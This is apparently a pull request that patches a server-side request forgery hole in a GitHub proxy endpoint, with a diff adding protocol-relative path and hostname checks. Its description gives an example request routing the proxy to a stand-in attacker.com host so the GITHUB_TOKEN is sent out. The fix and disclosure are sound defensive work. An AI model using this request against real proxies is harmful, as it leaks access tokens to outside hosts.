### PR TITLE
fix(security): prevent SSRF and GITHUB_TOKEN leak in github-proxy.js

### DIFF
--- a/api/github-proxy.js
+++ b/api/github-proxy.js
@@ -82,12 +82,15 @@ const normalizePath = (path) => {
 };
 
 const isSafeGitHubPath = (path) => {
-  if (path.includes("..") || path.includes("@") || path.includes("://")) {
+  if (path.includes("..") || path.includes("@") || path.includes("://") || path.startsWith("//")) {
     return false;
   }
 
-  const { pathname } = new URL(path, "https://api.github.com");
-  return SAFE_GITHUB_PATH_PATTERNS.some((pattern) => pattern.test(pathname));
+  const url = new URL(path, "https://api.github.com");
+  if (url.hostname !== "api.github.com") {
+    return false;
+  }
+  return SAFE_GITHUB_PATH_PATTERNS.some((pattern) => pattern.test(url.pathname));
 };
 
 async function handler(req, res) {


### PR DESCRIPTION
## Summary

Fixes #5534 — **critical SSRF vulnerability** in `api/github-proxy.js` allowing any authenticated user to exfiltrate the `GITHUB_TOKEN` environment variable to an arbitrary HTTPS host.

## Vulnerability

The `isSafeGitHubPath()` function blocked paths containing `..`, `@`, or `://`, but missed **protocol-relative URLs** starting with `//`.

**Exploit:**
```
GET /api/github-proxy?path=//attacker.com/repos/owner/repo
```

1. `path.startsWith("//")` was not checked — validation passed
2. `new URL("//attacker.com/...", "https://api.github.com")` resolved to `https://attacker.com/...`
3. `pathname` matched safe pattern — validation passed
4. Request forwarded to attacker's server with `Authorization: token <GITHUB_TOKEN>`

## Fix

1. Added `path.startsWith("//")` check to block protocol-relative URLs
2. Added hostname validation (`url.hostname !== "api.github.com"`) as a defense-in-depth measure after URL resolution

## Changes

- `api/github-proxy.js` — Hardened `isSafeGitHubPath()` with protocol-relative URL check and hostname validation
